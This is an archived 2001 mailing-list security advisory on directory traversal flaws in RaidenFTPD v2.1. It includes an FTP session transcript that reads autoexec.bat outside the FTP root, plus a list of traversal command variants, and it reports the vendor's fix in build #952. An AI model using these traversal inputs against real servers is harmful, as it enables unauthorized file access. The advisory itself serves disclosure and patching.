OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: joetestaHUSHMAIL.COM
Date: Wed Apr 25 2001 - 20:13:06 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ----- Begin Hush Signed Message from joetestahushmail.com -----

    Vulnerabilities in RaidenFTPD Server

        Overview

    RaidenFTPD v2.1 is an ftp server available from
    http://playstation2.idv.tw/raidenftpd. Vulnerabilities exist which allow
    users to break out of the ftp root.

        Details

    The following is an illustration of the problem:

    > ftp localhost
    220-This FTP site is running free version of RaidenFTPD
    220-Download chinese version from http://playstation2.idv.tw/raiden-ftpd-
    site/
    220-Download english version from http://playstation2.idv.tw/raidenftpd/
    220-RaidenFTPD32 for RaidenFTPD (up since 2001/04/20 15:00)
    220-This server is for private use only
    220-If you do not have access to this server
    220-Please disconnect now
    220 Please enter your login name now.
    User (xxxxxxxx.rh.rit.edu:(none)): jdog
    331 Password required for jdog .
    Password:
      [really long login banner edited out]
    230 User jdog logged in , proceed.
    ftp> get ....\....\autoexec.bat
    200 Port command ok.
    150 Sending /....\....\autoexec.bat (419 bytes). Mode STREAM Type ASCII
    226-++s+u_z U : 419 _+_+ W : 0 _+_+
    226-+Ut+O : 419 kb/sec _z Unlimited kb U+B+
    226-+e++O /
    226 Transfer finished successfully. Data connection closed.
    ftp: 419 bytes received in 0.27Seconds 1.55Kbytes/sec.
    ftp> cd ....
    250-++-U+ 1323 mb
    250 "/.." is current directory.

    This excerpt was taken from a session involving build #947. The vendor
    released
    four builds since I initially contacted them to address additional
    variations. The following is a list of vulnerabilities which affected
    these intermediate versions:

    CWD \....
    CWD *\.....
    CWD /..../
    NLST ..
    NLST ...
    NLST \..\
    NLST \...\

        Solution

    Upgrade to build #952 at:
    http://playstation2.idv.tw/raidenftpd/download.html

        Vendor Status

    Team JohnLong was contacted via <jlkplaystation2.idv.tw> on
    Friday, April 20, 2001. They quickly responded and worked diligently
    on the problems until all issues were fixed.

        - Joe Testa

    e-mail: joetestahushmail.com
    web page: http://hogs.rit.edu/~joet
    AIM: LordSpankatron

    ----- Begin Hush Signature v1.3 -----
    DETiFUfoDmGE9uJrpJQgFYn0g6gsy4jHJP1HF9UYGCGXml8h83eoWF/cf5RQyGkHmr0R
    ugydtjBf8iVLc0IMCfWMvOjYr0nlTaD61+gMW3L+2f2e1B2Q4S4h2Stlr2KYtGgCWy1S
    6mTEVkFx7gYyQkA/U3cTf6anmWXsdqQRpldlQQCr8J4HfW4chdqUNg9mSyffhX8Lin6S
    bx5br4lSTfcnxcJLZjtfNK/r1H2/dPv/3JGf1YbIBK/2SusAvyhaNibLfE9rIBfSB+Tn
    L169d/o0fSk9zJMceIzXPqv12AgXyeqPSlOdc647BsSSCH1GyyojWy+4YHnAeCfzenps
    OjB7vBfW3OoRgNsLqVk1kd10vtOGjZmz+axV+LaVbatnG6qeo2ymkYX7sJRnf5LI+8CR
    /O7vxrzfNxjqHsc0FIHLa6/FFZDG570D3SZYdsX3rPXCBzUV11xp4SJ0KsZsGIy33OnD
    9H9lWZeoDNOnJE4/2WKw+y8KE5Io/BDeXrmW63LeHeSS
    ----- End Hush Signature v1.3 -----

    This message has been signed with a Hush Digital Signature.
    To verify the signature, please go to www.hush.com/tools

    Free, encrypted, secure Web-based email at www.hushmail.com